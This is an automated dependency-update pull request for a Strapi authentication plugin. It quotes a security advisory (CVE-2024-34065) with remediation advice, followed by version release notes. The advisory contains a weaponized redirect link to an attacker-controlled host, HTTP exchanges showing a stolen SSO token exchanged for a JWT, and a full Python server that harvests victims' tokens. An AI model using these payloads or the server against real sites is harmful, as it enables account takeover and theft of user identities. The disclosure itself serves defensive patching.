fix(deps): update dependency @strapi/plugin-users-permissions to v4.24.2 [security]

[renovate[bot]]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
@strapi/plugin-users-permissions	4.15.5 -> 4.24.2

GitHub Vulnerability Alerts

CVE-2024-34065

Summary

By combining two vulnerabilities (an Open Redirect and session token sent as URL query parameter) in Strapi framework is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).

Impact

Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps.

Technical details

Vulnerability 1: Open Redirect

Description

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

In the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.

Remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:

• Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
• Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

• The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
• The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.

Example 1: Open Redirect in /api/connect/microsoft via $_GET["callback"]

• Path: /api/connect/microsoft
• Parameter: $_GET["callback"]

Payload:

https://google.fr/

Final payload:

https://<TARGET>/api/connect/microsoft?callback=https://google.fr/

User clicks on the link:

Look at the intercepted request in Burp and see the redirect to Microsoft:

Microsoft check the cookies and redirects to the original domain (and route) but with different GET parameters.

Then, the page redirects to the domain controlled by the attacker (and a token is added to controlled the URL):

The domain originally specified (https://google.fr) as $_GET["callback"] parameter is present in the cookies. So \<TARGET> is using the cookies (koa.sess) to redirect.

koa.sess cookie:

eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==

{"grant":{"provider":"microsoft","dynamic":{"callback":"https://google.fr/"}},"_expire":1700234244263,"_maxAge":86400000}

The vulnerability seems to come from the application's core:

File: packages/plugins/users-permissions/server/controllers/auth.js

'use strict';

/**
 * Auth.js controller
 *
 * @​description: A set of functions called "actions" for managing `Auth`.
 */

/* eslint-disable no-useless-escape */
const crypto = require('crypto');
const _ = require('lodash');
const { concat, compact, isArray } = require('lodash/fp');
const utils = require('@​strapi/utils');
const {
  contentTypes: { getNonWritableAttributes },
} = require('@​strapi/utils');
const { getService } = require('../utils');
const {
  validateCallbackBody,
  validateRegisterBody,
  validateSendEmailConfirmationBody,
  validateForgotPasswordBody,
  validateResetPasswordBody,
  validateEmailConfirmationBody,
  validateChangePasswordBody,
} = require('./validation/auth');

const { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;
const { ApplicationError, ValidationError, ForbiddenError } = utils.errors;

const sanitizeUser = (user, ctx) => {
  const { auth } = ctx.state;
  const userSchema = strapi.getModel('plugin::users-permissions.user');

  return sanitize.contentAPI.output(user, userSchema, { auth });
};

module.exports = {
  async callback(ctx) {
    const provider = ctx.params.provider || 'local';
    const params = ctx.request.body;

    const store = strapi.store({ type: 'plugin', name: 'users-permissions' });
    const grantSettings = await store.get({ key: 'grant' });

    const grantProvider = provider === 'local' ? 'email' : provider;

    if (!_.get(grantSettings, [grantProvider, 'enabled'])) {
      throw new ApplicationError('This provider is disabled');
    }

    if (provider === 'local') {
      await validateCallbackBody(params);

      const { identifier } = params;

      // Check if the user exists.
      const user = await strapi.query('plugin::users-permissions.user').findOne({
        where: {
          provider,
          $or: [{ email: identifier.toLowerCase() }, { username: identifier }],
        },
      });

      if (!user) {
        throw new ValidationError('Invalid identifier or password');
      }

      if (!user.password) {
        throw new ValidationError('Invalid identifier or password');
      }

      const validPassword = await getService('user').validatePassword(
        params.password,
        user.password
      );

      if (!validPassword) {
        throw new ValidationError('Invalid identifier or password');
      }

      const advancedSettings = await store.get({ key: 'advanced' });
      const requiresConfirmation = _.get(advancedSettings, 'email_confirmation');

      if (requiresConfirmation && user.confirmed !== true) {
        throw new ApplicationError('Your account email is not confirmed');
      }

      if (user.blocked === true) {
        throw new ApplicationError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    }

    // Connect the user with the third-party provider.
    try {
      const user = await getService('providers').connect(provider, ctx.query);

      if (user.blocked) {
        throw new ForbiddenError('Your account has been blocked by an administrator');
      }

      return ctx.send({
        jwt: getService('jwt').issue({ id: user.id }),
        user: await sanitizeUser(user, ctx),
      });
    } catch (error) {
      throw new ApplicationError(error.message);
    }
  },

  //...

  async connect(ctx, next) {
    const grant = require('grant-koa');

    const providers = await strapi
      .store({ type: 'plugin', name: 'users-permissions', key: 'grant' })
      .get();

    const apiPrefix = strapi.config.get('api.rest.prefix');
    const grantConfig = {
      defaults: {
        prefix: `${apiPrefix}/connect`,
      },
      ...providers,
    };

    const [requestPath] = ctx.request.url.split('?');
    const provider = requestPath.split('/connect/')[1].split('/')[0];

    if (!_.get(grantConfig[provider], 'enabled')) {
      throw new ApplicationError('This provider is disabled');
    }

    if (!strapi.config.server.url.startsWith('http')) {
      strapi.log.warn(
        'You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url'
      );
    }

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
  },

  //...

};

And more specifically:

...

    // Ability to pass OAuth callback dynamically
    grantConfig[provider].callback =
      _.get(ctx, 'query.callback') ||
      _.get(ctx, 'session.grant.dynamic.callback') ||
      grantConfig[provider].callback;
    grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

    return grant(grantConfig)(ctx, next);
...

Possible patch:

grantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback

_.get(ctx, 'query.callback') = $_GET["callback"] and _.get(ctx, 'session') = $_COOKIE["koa.sess"] (which is {"grant":{"provider":"microsoft","dynamic":{"callback":"https://XXXXXXX/"}},"_expire":1701275652123,"_maxAge":86400000}) so _.get(ctx, 'session.grant.dynamic.callback') = https://XXXXXXX/.

The route is clearly defined here:

File: packages/plugins/users-permissions/server/routes/content-api/auth.js

'use strict';

module.exports = [

//...

  {
    method: 'GET',
    path: '/auth/:provider/callback',
    handler: 'auth.callback',
    config: {
      prefix: '',
    },
  },

  //...

];

File: packages/plugins/users-permissions/server/services/providers-registry.js

const getInitialProviders = ({ purest }) => ({

//..

  async microsoft({ accessToken }) {
    const microsoft = purest({ provider: 'microsoft' });

    return microsoft
      .get('me')
      .auth(accessToken)
      .request()
      .then(({ body }) => ({
        username: body.userPrincipalName,
        email: body.userPrincipalName,
      }));
  },

//..

});

If parameter $_GET["callback"] is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie koa.sess:

koa.sess=eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9

Which once base64 decoded become {"grant":{"provider":"microsoft","dynamic":{"callback":"https://<TARGET>/users/auth/redirect"}},"_expire":1701275652123,"_maxAge":86400000}.

The signature of the cookie is stored in cookie koa.sess.sig:

koa.sess.sig=wTRmcVRrn88hWMdg84VvSD87-_0

File: packages/plugins/users-permissions/server/bootstrap/grant-config.js

//..

  microsoft: {
    enabled: false,
    icon: 'windows',
    key: '',
    secret: '',
    callback: `${baseURL}/microsoft/callback`,
    scope: ['user.read'],
  },

//..

Vulnerability 2: Session token in URL

Description

Applications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Example 1: SSO token transmitted within URL ($_GET["access_token"])

• Path: /api/connect/microsoft
• Parameter: $_GET["callback"]

When a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.

Weaponized payload:

https://<TARGET>/api/connect/microsoft?callback=http://<C2>:8080/

With a web server specially developed to exploit the vulnerability listening on \<C2>:8080, it is possible to retrieve a JWT token allowing authentication on Strapi.

A user is on his browser when he decides to click on a link sent to him by e-mail.

The attacker places the malicious link in the URL bar to simulate a victim's click.

The server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user's SSO token.

Everything is invisible to the victim.

Because the victim didn't change to another Web page.

The attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.

Details

Get the JWT token with the access_token

First of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.

Request (HTTP):

GET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKV<REDACTED>yBzA HTTP/1.1
Host: <TARGET>

Response (HTTP):

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Nov 2023 17:58:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 411
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"jwt":"eyJhbG<REDACTED>eCac","user":{"id":111,"username":"<REDACTED>@&#8203;<REDACTED>-ext.com","email":"<redacted>@&#8203;<redacted>-ext.com","provider":"microsoft","confirmed":true,"blocked":false,"createdAt":"2023-11-14T12:35:42.440Z","updatedAt":"2023-11-16T21:00:19.241Z","is_external":false}}

Request API routes using the JWT token

Then reuse the JWT token to request the API.

Request (HTTP):

GET /api/users/me/groups?app=support HTTP/1.1
Host: <TARGET>
Authorization: Bearer eyJ<REDACTED>EeCac

Response (HTTP):

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Nov 2023 13:45:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 24684
Connection: keep-alive
Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline'
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Vary: Origin
X-RateLimit-Limit: 10
X-RateLimit-Remaining: 9
X-RateLimit-Reset: 1701179203
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: <REDACTED>

{"apps":{"support":{"groups":[{"device_whitelist":null,"name":"test - support","id":10,"group_privileges":[{"id":37,<REDACTED>

...

POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

import base64
import json
import urllib.parse

from http.server import BaseHTTPRequestHandler, HTTPServer
from sys import argv

# Strapi URL.
TARGET = "target.com"

# URLs to which victims are automatically redirected.
REDIRECT_URL = [
    "strapi.io",
    "www.google.fr"
]

# URL used to generate a valid JWT token for authentication within the
# application.
GEN_JWT_URL = f"https://{TARGET}/api/auth/microsoft/callback"

# This function is used to generate a curl command which once executed, will

# give us a valid JWT connection token.
def generate_curl_command(token):
    command = f"curl '{GEN_JWT_URL}?access_token={token}'"
    return command

# We create a custom HTTP server to retrieve users' SSO tokens.
class CustomServer(BaseHTTPRequestHandler):

    # Here we override the default logging function to reduce verbosity.
    def log_message(self, format, *args):
        pass

    # This function automatically redirects a user to the page defined in the
    # global variable linked to the redirection.
    def _set_response(self):
        self.send_response(302)
        self.send_header("Location", REDIRECT_URL[0])
        self.end_headers()

    # If an SSO token is present, we parse it and log the result in STDOUT.
    def do_GET(self):
        # This condition checks whether a token is present in the URL.
        if str(self.path).find("access_token") != -1:
            # If this is the case, we recover the token.
            query = urllib.parse.urlparse(self.path).query
            query_components = dict(qc.split("=") for qc in query.split("&"))
            access_token = urllib.parse.unquote(query_components["access_token"])

            # In the token, which is a string in JWT format, we retrieve the
            # body part of the token.
            interesting_data = access_token.split(".")[1]

            # Patching base64 encoded data.
            interesting_data = interesting_data + "=" * (-len(interesting_data) % 4)

            # Parsing JSON.
            json_data = json.loads(base64.b64decode(interesting_data.encode()))
            family_name, given_name, ipaddr, upn = json_data["given_name"], json_data["family_name"], json_data["ipaddr"], json_data["upn"]

            print(f"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\n{access_token}\n")
            print(f"[*] Run: \"{generate_curl_command(query_components['access_token'])}\" to get JWT token")

        self._set_response()
        self.wfile.write("Redirecting ...".encode("utf-8"))

def run(server_class=HTTPServer, handler_class=CustomServer, ip="0.0.0.0", port=8080):
    server_address = (ip, port)
    httpd = server_class(server_address, handler_class)

    print(f"Starting httpd ({ip}:{port}) ...")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass

    httpd.server_close()
    print("Stopping httpd ...")

if __name__ == "__main__":
    if len(argv) == 3:
        run(ip=argv[1], port=int(argv[2]))
    else:
        run()

---

Release Notes

strapi/strapi (@​strapi/plugin-users-permissions)

### [`v4.24.2`](https://togithub.com/strapi/strapi/releases/tag/v4.24.2) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.24.1...v4.24.2) ##### :warning: Security Warning and Notice :warning: Strapi was made aware of a vulnerably that were patched in this release, for now we are going to delay the detailed disclosure of the exact details on how to exploit it and how it was patched to give time for users to upgrade before we do public disclosure. ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 **Full Changelog**: https://github.com/strapi/strapi/compare/v4.24.2...v4.24.1 ### [`v4.24.1`](https://togithub.com/strapi/strapi/releases/tag/v4.24.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.24.0...v4.24.1) ##### 🔥 Bug fix - \[core:admin] fix(admin): if were in EE mode wait for the EE routes to be loaded before rendering [https://github.com/strapi/strapi/pull/20238](https://togithub.com/strapi/strapi/pull/20238)8) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:content-manager] fix(content-manager): bulk publish would only ever show first entry to be published [https://github.com/strapi/strapi/pull/20234](https://togithub.com/strapi/strapi/pull/20234)4) [@​Feranchz](https://togithub.com/Feranchz) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.24.0`](https://togithub.com/strapi/strapi/releases/tag/v4.24.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.23.2...v4.24.0) ##### 🔥 Bug fix - \[core:admin] fix: ee not being extended because no default export [https://github.com/strapi/strapi/pull/20171](https://togithub.com/strapi/strapi/pull/20171)1) [@​alexandrebodin](https://togithub.com/alexandrebodin) - \[core:content-manager] fix: content could be undefined [https://github.com/strapi/strapi/pull/20180](https://togithub.com/strapi/strapi/pull/20180)0) [@​alexandrebodin](https://togithub.com/alexandrebodin) - \[core:database] fix(database): add prefix to avoid join column name conflicts [https://github.com/strapi/strapi/pull/20027](https://togithub.com/strapi/strapi/pull/20027)7) [@​innerdvations](https://togithub.com/innerdvations) - \[core:upload] enhancement: use file path in place of streams to optimize sharp fragmentation & libvips caching [https://github.com/strapi/strapi/pull/20080](https://togithub.com/strapi/strapi/pull/20080)0) [@​alexandrebodin](https://togithub.com/alexandrebodin) ##### ⚙️ Chore - \[core:core] Make cors middleware compliant with the intended spec [https://github.com/strapi/strapi/pull/20044](https://togithub.com/strapi/strapi/pull/20044)4) [@​alexandrebodin](https://togithub.com/alexandrebodin) - \[dependencies] Chore: Upgrade mysql2 from 3.6.0 to 3.9.4 [https://github.com/strapi/strapi/pull/20123](https://togithub.com/strapi/strapi/pull/20123)3) [@​derrickmehaffy](https://togithub.com/derrickmehaffy) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.23.2`](https://togithub.com/strapi/strapi/releases/tag/v4.23.2) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.23.1...v4.23.2) ##### What's Changed - fix: issue 20138 by [@​alexandrebodin](https://togithub.com/alexandrebodin) in [https://github.com/strapi/strapi/pull/20231](https://togithub.com/strapi/strapi/pull/20231) **Full Changelog**: https://github.com/strapi/strapi/compare/v4.23.1...v4.23.2 ### [`v4.23.1`](https://togithub.com/strapi/strapi/releases/tag/v4.23.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.23.0...v4.23.1) ##### 📖 Documentation - \[docs] Add Local Search plugin to Contributor docs [https://github.com/strapi/strapi/pull/20036](https://togithub.com/strapi/strapi/pull/20036)6) [@​pwizla](https://togithub.com/pwizla) ##### ⚙️ Chore - \[dependencies] chore(pack-up): remove from monorepo [https://github.com/strapi/strapi/pull/20082](https://togithub.com/strapi/strapi/pull/20082)2) [@​joshuaellis](https://togithub.com/joshuaellis) - \[dependencies] chore(deps): bump [@​strapi/design-system](https://togithub.com/strapi/design-system) from 1.16.0 to 1.18.0 ([https://github.com/strapi/strapi/pull/20115](https://togithub.com/strapi/strapi/pull/20115)) [@​markkaylor](https://togithub.com/markkaylor) ##### 🔥 Bug fix - \[core:content-releases] fix(content-releases): fix e2e failing test [https://github.com/strapi/strapi/pull/20094](https://togithub.com/strapi/strapi/pull/20094)4) [@​simotae14](https://togithub.com/simotae14) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.23.0`](https://togithub.com/strapi/strapi/releases/tag/v4.23.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.22.1...v4.23.0) ##### ⚙️ Chore - \[dependencies] Chore: Update vite and webpack-dev-middleware [https://github.com/strapi/strapi/pull/20037](https://togithub.com/strapi/strapi/pull/20037)7) [@​derrickmehaffy](https://togithub.com/derrickmehaffy) - \~\[external] Update sharp package to version v0.33.3[https://github.com/strapi/strapi/pull/19311](https://togithub.com/strapi/strapi/pull/19311)11) [@​mariansimecek](https://togithub.com/mariansimecek)~ - \[tooling] chore: ignore nx cache [https://github.com/strapi/strapi/pull/20023](https://togithub.com/strapi/strapi/pull/20023)3) [@​innerdvations](https://togithub.com/innerdvations) - \[tooling] chore: add watch script for all projects [https://github.com/strapi/strapi/pull/20068](https://togithub.com/strapi/strapi/pull/20068)8) [@​innerdvations](https://togithub.com/innerdvations) ##### 🔥 Bug fix - \[core:admin] fix(admin): force an absolute URL if the BACKEND_URL is relative [https://github.com/strapi/strapi/pull/19950](https://togithub.com/strapi/strapi/pull/19950)0) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:content-releases] Hide Locale column and grouping option when i18n plugin is not installed [https://github.com/strapi/strapi/pull/19358](https://togithub.com/strapi/strapi/pull/19358)8) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix: fix boot issue when removing i18n from an app [https://github.com/strapi/strapi/pull/20073](https://togithub.com/strapi/strapi/pull/20073)3) [@​Marc-Roig](https://togithub.com/Marc-Roig) - \[core:helper-plugin] fix issue [#​19532](https://togithub.com/strapi/strapi/issues/19532) ([https://github.com/strapi/strapi/pull/19970](https://togithub.com/strapi/strapi/pull/19970)) [@​alexandrebodin](https://togithub.com/alexandrebodin) - \[core:strapi] fix(content-manager): populate media and nested components on cloning [https://github.com/strapi/strapi/pull/19958](https://togithub.com/strapi/strapi/pull/19958)8) [@​simotae14](https://togithub.com/simotae14) - \[core:upload] Revert sharp to 0.32.6 [https://github.com/strapi/strapi/pull/20066](https://togithub.com/strapi/strapi/pull/20066)6) [@​markkaylor](https://togithub.com/markkaylor) ##### 🚀 New feature - \[core:content-releases] Feat(releases): add release column to CM list view [https://github.com/strapi/strapi/pull/19926](https://togithub.com/strapi/strapi/pull/19926)6) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) ##### 💅 Enhancement - \[core:database] feat: support media deep filtering & relation shortcut filters [https://github.com/strapi/strapi/pull/19971](https://togithub.com/strapi/strapi/pull/19971)1) [@​alexandrebodin](https://togithub.com/alexandrebodin) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.22.1`](https://togithub.com/strapi/strapi/releases/tag/v4.22.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.22.0...v4.22.1) ##### What's Changed - Chore: Revert [@​koa/cors](https://togithub.com/koa/cors) upgrade to 5.0.0 due to breaking cors middleware by [@​derrickmehaffy](https://togithub.com/derrickmehaffy) in [https://github.com/strapi/strapi/pull/20041](https://togithub.com/strapi/strapi/pull/20041) **Full Changelog**: https://github.com/strapi/strapi/compare/v4.22.0...v4.22.1 ### [`v4.22.0`](https://togithub.com/strapi/strapi/releases/tag/v4.22.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.21.1...v4.22.0) ##### :warning: Security Warning and Notice :warning: Strapi was made aware of a vulnerably that were patched in this release, for now we are going to delay the detailed disclosure of the exact details on how to exploit it and how it was patched to give time for users to upgrade before we do public disclosure. ##### 🔥 Bug fix - \[core:content-manager] fix: Creating a new locale doesn't pre-fill the non-internationalized fields [https://github.com/strapi/strapi/pull/18773](https://togithub.com/strapi/strapi/pull/18773)3) [@​derrickmehaffy](https://togithub.com/derrickmehaffy) - \[core:content-manager] fix: show name of relations when lazy loading them [https://github.com/strapi/strapi/pull/19915](https://togithub.com/strapi/strapi/pull/19915)5) [@​Marc-Roig](https://togithub.com/Marc-Roig) - \[core:content-releases] fix(releases): Scheduling info capitalization [https://github.com/strapi/strapi/pull/19945](https://togithub.com/strapi/strapi/pull/19945)5) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) - \[core:content-releases] fix(releases): On edit release error dont close modal [https://github.com/strapi/strapi/pull/19946](https://togithub.com/strapi/strapi/pull/19946)6) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) - \[core:upload] fix: sanitize file name when uploading image [https://github.com/strapi/strapi/pull/19913](https://togithub.com/strapi/strapi/pull/19913)3) [@​Marc-Roig](https://togithub.com/Marc-Roig) - \[plugin:i18n] fix:issue on do not validate locale if not creating for all locales [https://github.com/strapi/strapi/pull/19799](https://togithub.com/strapi/strapi/pull/19799)9) [@​binar1](https://togithub.com/binar1) ##### 🚀 New feature - \[core:content-releases] Feat(releases): Bulk Release [https://github.com/strapi/strapi/pull/19891](https://togithub.com/strapi/strapi/pull/19891)1) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) - \[plugin:graphql] fix(plugin-graphql): allow to use GET queries for graphql [https://github.com/strapi/strapi/pull/19168](https://togithub.com/strapi/strapi/pull/19168)8) [@​mcfedr](https://togithub.com/mcfedr) ##### ⚙️ Chore - \[dependencies] chore(deps): bump [@​koa/cors](https://togithub.com/koa/cors) from 3.4.3 to 5.0.0 ([https://github.com/strapi/strapi/pull/19921](https://togithub.com/strapi/strapi/pull/19921)) [@​derrickmehaffy](https://togithub.com/derrickmehaffy) - \[dependencies] chore(deps): bump sanitize-html (and types) from 2.11.0 to 2.13.0 [https://github.com/strapi/strapi/pull/19922](https://togithub.com/strapi/strapi/pull/19922)2) [@​derrickmehaffy](https://togithub.com/derrickmehaffy) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.21.1`](https://togithub.com/strapi/strapi/releases/tag/v4.21.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.21.0...v4.21.1) ##### 💅 Enhancement - \[core:content-manager] feat(Releases): Bulk actions renderer [https://github.com/strapi/strapi/pull/19749](https://togithub.com/strapi/strapi/pull/19749)9) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) ##### 🔥 Bug fix - \[core:admin] fix(admin): show purchase pages also with Cloud plans and change message [https://github.com/strapi/strapi/pull/19855](https://togithub.com/strapi/strapi/pull/19855)5) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): fix creation of utc time based when sending to back [https://github.com/strapi/strapi/pull/19865](https://togithub.com/strapi/strapi/pull/19865)5) [@​Feranchz](https://togithub.com/Feranchz) - \[core:content-type-builder] fix: reload ctb after save [https://github.com/strapi/strapi/pull/19811](https://togithub.com/strapi/strapi/pull/19811)1) [@​Bassel17](https://togithub.com/Bassel17) - \[core:data-transfer] fix: add support for private upload providers [https://github.com/strapi/strapi/pull/19863](https://togithub.com/strapi/strapi/pull/19863)3) [@​Bassel17](https://togithub.com/Bassel17) - \[core:data-transfer] Solve foreign key error on push transfers [https://github.com/strapi/strapi/pull/19870](https://togithub.com/strapi/strapi/pull/19870)0) [@​christiancp100](https://togithub.com/christiancp100) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.21.0`](https://togithub.com/strapi/strapi/releases/tag/v4.21.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.5...v4.21.0) ##### 💅 Enhancement - \[plugin:users-permissions] EE feat: Add keycloak native users-permissions provider [https://github.com/strapi/strapi/pull/19741](https://togithub.com/strapi/strapi/pull/19741)1) [@​derrickmehaffy](https://togithub.com/derrickmehaffy) ##### 🚀 New feature - \[core:content-releases] removing scheduling future flag for stable release [https://github.com/strapi/strapi/pull/19754](https://togithub.com/strapi/strapi/pull/19754)4) [@​Feranchz](https://togithub.com/Feranchz) - \[core:content-releases] fix content releases cache issue [https://github.com/strapi/strapi/pull/19791](https://togithub.com/strapi/strapi/pull/19791)1) [@​Feranchz](https://togithub.com/Feranchz) - \[core:content-releases] new create many release actions endpoint [https://github.com/strapi/strapi/pull/19778](https://togithub.com/strapi/strapi/pull/19778)8) [@​Feranchz](https://togithub.com/Feranchz) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ### [`v4.20.5`](https://togithub.com/strapi/strapi/releases/tag/v4.20.5) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.4...v4.20.5) ##### 🔥 Bug fix - \[core:content-releases] fix(content-releases): Limit min date selection to schedule a release [https://github.com/strapi/strapi/pull/19636](https://togithub.com/strapi/strapi/pull/19636)6) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) - \[core:content-releases] fix(content-releases): remove the error in the console when we delete a release [https://github.com/strapi/strapi/pull/19690](https://togithub.com/strapi/strapi/pull/19690)0) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): exclude release content-types from graphql [https://github.com/strapi/strapi/pull/19703](https://togithub.com/strapi/strapi/pull/19703)3) [@​markkaylor](https://togithub.com/markkaylor) - \[core:content-releases] fix: change actions locale when changes on localization [https://github.com/strapi/strapi/pull/19706](https://togithub.com/strapi/strapi/pull/19706)6) [@​Feranchz](https://togithub.com/Feranchz) - \[core:content-type-builder] Remove add another field button if it's dynamic zone from CTB [https://github.com/strapi/strapi/pull/19639](https://togithub.com/strapi/strapi/pull/19639)9) [@​Bassel17](https://togithub.com/Bassel17) - \[core:upload] Add sizeInBytes on resized and optimized images [https://github.com/strapi/strapi/pull/19707](https://togithub.com/strapi/strapi/pull/19707)7) [@​giu1io](https://togithub.com/giu1io) ##### ⚙️ Chore - \[dependencies] chore(deps): update ds to 1.16.0 [https://github.com/strapi/strapi/pull/19678](https://togithub.com/strapi/strapi/pull/19678)8) [@​joshuaellis](https://togithub.com/joshuaellis) - \[tooling] chore(tests): backport e2e config [https://github.com/strapi/strapi/pull/19654](https://togithub.com/strapi/strapi/pull/19654)4) 